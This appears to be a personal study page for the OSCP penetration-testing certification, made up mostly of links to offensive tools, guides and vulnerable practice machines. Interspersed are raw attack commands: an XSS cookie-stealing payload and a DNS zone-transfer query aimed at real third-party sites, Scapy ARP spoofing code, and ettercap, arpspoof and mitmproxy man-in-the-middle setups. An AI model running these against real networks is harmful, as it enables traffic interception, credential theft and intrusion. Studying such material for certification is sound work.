Offensive Security Certified Professional (OSCP)
Offensive Security Certified Professional (OSCP) is an ethical hacking certification offered by Offensive Security that teaches penetration testing methodologies and the use of the tools included with the BackTrack penetration testing distribution (now carried out with the Kali Linux distribution).[1][2] The OSCP certification consists of a hands-on exam that requires successfully attacking and penetrating several machines in a safe, controlled environment.[3] It is currently one of the few certifications that requires evidence of practical skills, in the form of a penetration test.
Preparation references
- shi_ver_bot : A Telegram bot to see if your password was in the BreachCompilation
beef project
boca site, search: <script>alert(document.cookie)</script>
dig @200.111.157.67 unap.cl -t AXFR
port knocking
https://blog.wpscans.com/sniff-wordpress-login-credentials-wireshark-http-connection/
https://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/ https://kali.training/lessons/introduction/
https://kali.training/topic/introduction-to-kali-linux/
https://www.offensive-security.com/information-security-certifications/oswe-offensive-security-web-expert/ https://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/ https://www.offensive-security.com/information-security-training/penetration-testing-training-kali-linux/
(ip.addr == 10.168.40.145) and (!udp contains "HTTP/1.1")
https://tools.kali.org/information-gathering/nmap
ip.src == 192.168.0.99 && tcp.flags.syn==1 && tcp.flags.ack==1
https://github.com/alearea51/IKn0wU
https://github.com/TunisianEagles/SocialBox
https://github.com/gentilkiwi/mimikatz https://github.com/AlessandroZ/LaZagne
https://github.com/vk496/linset
https://github.com/WifiPhisher
https://github.com/xtr4nge/FruityWifi
scapy
a = ARP(op="who-has", psrc="192.168.168.2", pdst="192.168.168.131", hwdst="fe80::4067:2e3f:d06:61bd")
send(a, inter=3, loop=1)
a = ARP(op="who-has", psrc="10.168.40.1", pdst="10.168.40.70", hwdst="fe80::4067:2e3f:d06:61bd")
10.168.40.1
IP to spoof, victim IP, victim MAC:
a = ARP(op="who-has", psrc="10.168.40.1", pdst="10.168.40.70", hwdst="08:00:27:52:2D:A0")
send(a, inter=3, loop=1)
ettercap
ettercap -T -q -i eth0 -P dns_spoof -M arp /10.168.40.145///
tcpdump -n -i wlan0 -e 'arp or icmp'
arping -c 1 -I wlan0 10.168.40.1
ARPING 10.168.40.1
60 bytes from 08:00:27:7e:b5:f7 (10.168.40.1): index=0 time=1.363 msec
60 bytes from 00:17:c5:15:81:6a (10.168.40.1): index=1 time=2.670 msec
--- 10.168.40.1 statistics ---
https://sandilands.info/sgordon/arp-spoofing-on-wired-lan
mitmproxy
arpspoof -i eth0 -t 10.168.40.70 10.168.40.1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8080
mitmproxy --mode transparent
bettercap -T ipvictima --proxy -P
https://github.com/byt3bl33d3r/MITMf https://backtrackacademy.com/articulo/saltando-hsts-con-man-in-the-middle-framework http://www.elladodelmal.com/2016/03/ataques-man-in-middle-hsts-sslstrip-2.html
https://www.trustwave.com/Resources/SpiderLabs-Blog/Changes-in-Oracle-Database-12c-password-hashes/
WIFI
https://github.com/xtr4nge/FruityC2
android https://github.com/M4sc3r4n0/Evil-Droid
extra
https://github.com/nixawk/pentest-wiki
https://geekflare.com/online-scan-website-security-vulnerabilities/
other
https://es.scribd.com/document/13213787/CUH-E-zine-4%C2%AA-Edicion
https://www.aircrack-ng.org/doku.php?id=es:aireplay-ng https://www.aircrack-ng.org/doku.php?id=es:deauthentication
https://www.offensive-security.com/metasploit-unleashed/
https://blog.segu-info.com.ar/2018/09/examen-de-prueba-para-estudiantes-del.html https://www.alienvault.com/blogs/security-essentials/how-to-prepare-to-take-the-oscp
OSCP
https://www.sniferl4bs.com/2015/11/entrenando-en-casa-para-rendir-el-oscp.html https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-1-is-oscp-for-you-b57cbcce7440 https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-2-workflow-and-documentation-tips-9dd335204a48 https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-3-practical-hacking-tips-and-tricks-c38486f5fc97
https://support.offensive-security.com/#!pwk-support.md https://support.offensive-security.com/#!oscp-exam-guide.md
https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf https://www.securitysift.com/offsec-pwb-oscp/ https://www.adampalmer.me/iodigitalsec/2013/04/11/offensive-security-pwb-course-and-oscp-certification-review/
https://vcatalan.com/2017/01/OSCP-part-I-preparacion-estudio-previo.html
https://mytcpip.com/2017/08/10/taller-de-hacking-i-nmap-a-fondo-metasploit-basico/ https://null-byte.wonderhowto.com/forum/upload-shell-from-phpmyadmin-xampp-by-mohamed-ahmed-0179931/
https://www.exam-labs.com/exam/NSE4#tutorial
https://www.ihacklabs.com/es/el-mejor-sistema-de-pivoting-en-linux/
https://wiki.wireshark.org/SampleCaptures
https://github.com/ibr2/pwk-cheatsheet
https://www.keiththome.com/oscp-course-review/
http://fl3x.us/blog/2015/09/22/order-wireless-devices-for-wifu-course/
https://amonsec.net/course/offensive-security-pwk-course-review
https://blog.g0tmi1k.com/2013/08/cracking-perimeter-ctp-offensive/
https://www.ihacklabs.com/es/certificacion-osce-review-cracking-the-perimeter-ctp/
http://www.vividmachines.com/shellcode/shellcode.html
https://www.securitysift.com/offsec-ctp-osce/
https://hackforums.net/member.php
http://nixware.net/my-osce-journey
http://www.cs.virginia.edu/~evans/cs216/guides/x86.html
https://www.pentesteracademy.com/topics
https://openwall.info/wiki/p_lkrg/Main
https://github.com/tanc7/hacking-books
https://infosecuritygeek.com/vulnhub-kioptrix-2014/
http://www.securitysift.com/offsec-pwb-oscp/
https://xapax.gitbooks.io/security/content/
https://medium.com/@bondo.mike/ptp-lab-privilege-escalation-with-services-5d14a99a28d1
https://medium.com/@m4lv0id/and-i-did-oscp-589babbfea19
CUPP, for building wordlists: git clone https://github.com/Mebus/cupp.git
Brute-force attacks against social networks: git clone https://github.com/TunisianEagles/SocialBox.git
Password dumping (memory dump): https://github.com/AlessandroZ/LaZagne
Cracking WPA/WPA2 with phishing: https://github.com/vk496/linset https://github.com/wifiphisher/wifiphisher
instabridge
--mode transparent
mitm.it/cert/p12
bettercap -T [ip_victima] --proxy -P
Evil-Droid git clone https://github.com/M4sc3r4n0/Evil-Droid.git
https://www.giuspen.com/cherrytree/
https://github.com/mikaelkall/HackingAllTheThings
https://www.vortex.id.au/2017/05/oscp-exam-preparation-exam-day-report-day/
https://github.com/P3t3rp4rk3r/OSCP-cheat-sheet-1
https://github.com/so87/OSCP-PwK
https://medium.com/@chennylmf/hackthebox-lame-c28b19558cb0
https://github.com/OlivierLaflamme/Cheatsheet-God
https://medium.com/@cymtrick/oscp-cheat-sheet-5b8aeae085ad
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
https://medium.com/@chennylmf/hackthebox-walkthrough-tartarsauce-810a8df296c1
http://www.fuzzysecurity.com/tutorials/16.html
Good reviews of CTP/OSCE (in no particular order):
Note: * mark means look for other posts on this blog
Tutorial sites (more stars = better/recommended):
Cheatsheets:
Good practice sites:
Vulnerable machines:
vulnhub VMs:
- SickOS 1.1
- SickOS 1.2
- Droopy v0.2
- Kevgir
- Pegasus
- SecTalks: BNE0x00 - Minotaur
- SecTalks: BNE0x03 - Simple
- NullByte: 1
- FristiLeaks 1.3
- OWASP Vulnerable Web Applications Directory Project
- Mutillidae
- Damn Vulnerable Web Application
LFI/RFI https://penetrate.io/2014/01/10/from-rfi-to-shell/
Backdooring files with Python: https://github.com/secretsquirrel/the-backdoor-factory
eBooks downloads: http://www.ebook777.com/gray-hat-hacking-ethical-hackers-handbook-fourth-edition/ https://github.com/JpGallegos/CySecBooks https://www.securepla.net/the-hacker-playbook-2/ “Hacking: The Art of Exploitation”
https://www.linkedin.com/pulse/osce-cracking-perimeter-experience-sunny-neo
- Fuzzing (Scapy, TAO, Sulley)
- Linux Exploitation (vanilla stack overflow, return to Glibc - NX bypass, repairing stack canaries, ASLR bypasses) and Windows exploitation (SEH overwrite, Return Oriented Programming into disabling DEP)
- Web Application Hacker's Handbook (might be too large: Consider “webgoat”)
Various sites:
http://www.sweetscape.com/ (010 Editor)
https://github.com/campagnola/pycca
https://github.com/Gallopsled/pwntools
https://github.com/reyammer/shellnoob
https://zeltser.com/convert-shellcode-to-assembly/
http://files.cnblogs.com/files/exclm/ollydbg_cmdline_cheat_sheet.pdf
http://bernardodamele.blogspot.sg/2011/09/reverse-shells-one-liners.html
https://www.digitalocean.com/community/tutorials/how-to-use-bash-history-commands-and-expansions-on-a-linux-vps
https://github.com/peterferrie/win-exec-calc-shellcode
http://www.secniu.com/why-my-shellcode-cannot-work/
http://thestarman.pcministry.com/asm/2bytejumps.htm
http://blog.noobroot.com/
https://www.exploit-db.com/exploits/5342/
http://exploit.co.il/hacking/manual-egghuntershellcode-encoding/
https://github.com/salcho/codetz
http://xangosec.blogspot.sg/2014/08/automating-sub-encoder.html
http://www.fuzzing.org/
http://resources.infosecinstitute.com/pattern-based-approach-memory-shellcodes-detection/
https://www.offensive-security.com/metasploit-unleashed/alphanumeric-shellcode/
https://0x41.no/hacking-networks-with-snmp/
http://danielebellavista.blogspot.sg/2014/10/ia32-shellcodes-get-eip-value.html
http://www.thepentesters.net/tutorials/tricks-escaping-linux-restricted-shells/
http://codemachine.com/downloads.html
Fun random stuff: http://patriciopalladino.com/files/hieroglyphy/ http://n01g3l.tumblr.com/ https://twitter.com/ch3rn0byl/status/832681279900487680
https://blog.g0tmi1k.com/2012/02/kioptrix-level-4-sql-injection/
https://blog.g0tmi1k.com/2012/01/hackademic-rtb2/
https://github.com/vanhoefm/modwifi https://github.com/vanhoefm/blackhat17-pocs
https://github.com/0x90/uberscapy
https://github.com/0x90/wifi-arsenal https://github.com/0x90/kali-scripts
https://nets.ec/Main_Page https://old.exploit-db.com/exploits/13284/
https://packetstormsecurity.com/files/90146/Ascii-To-Shellcode-Encoder-Decoder-Tool.html
https://underc0de.org/foro/hacking/que-es-una-shellcode/
https://0x00sec.org/t/linux-shellcoding-part-1-0/289